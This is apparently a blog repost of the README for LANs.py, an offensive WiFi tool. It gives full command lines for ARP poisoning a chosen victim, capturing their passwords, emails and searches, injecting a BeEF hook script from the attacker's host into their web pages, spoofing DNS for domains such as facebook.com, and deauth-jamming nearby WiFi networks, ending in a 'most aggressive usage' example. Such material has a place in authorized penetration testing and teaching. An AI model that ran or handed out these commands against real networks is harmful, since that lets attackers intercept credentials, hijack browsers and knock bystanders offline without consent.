LANs.py - Inject Code, Jam Wifi, And Spy on Wifi Users
LANs.py
- Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
- Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
- Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
All options:
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
[-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
[-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
[--directedonly] [--accesspoint ACCESSPOINT]
Usage
Common usage:
python LANs.py -u -p
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.
Screenshot:
Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.
Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-ip: target this IP address and skip the active targeting at the beginning
HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
<script>
tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.python LANs.py -c '<title>Owned.</title>'
<head>
tag and failing that, injects prior to the first </head>
tag. This example will change the page title to 'Owned.'Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
DNS spoofing
python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
Jam all WiFi networks:
python LANs.py --jam
Jam just one access point (router)
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY
All options:
Normal Usage:
- -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
- -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
- -d: open an xterm with driftnet to see all images they view
- -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
- -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
- -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
- -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
- -i INTERFACE: specify interface; default is first interface in
ip route
, eg: -i wlan0 - -ip: target this IP address
- -n: performs a quick nmap scan of the target
- -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
- -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
- -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
- -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
- -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
- -v: show verbose URLs which do not truncate at 150 characters like -u
- --jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary
- -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
- -ch CHANNEL: Limit wifijammer to single channel
- -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
- -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
- -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
- --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
- --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
- --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.
Clean up
Upon receiving a Ctrl-C:
-Turns off IP forwarding
-Flushes iptables firewall
-Individually restores the router and victim's ARP tables
LANs.py - Inject Code, Jam Wifi, And Spy on Wifi Users
Reviewed by Zion3R
on
6:17 PM
Rating: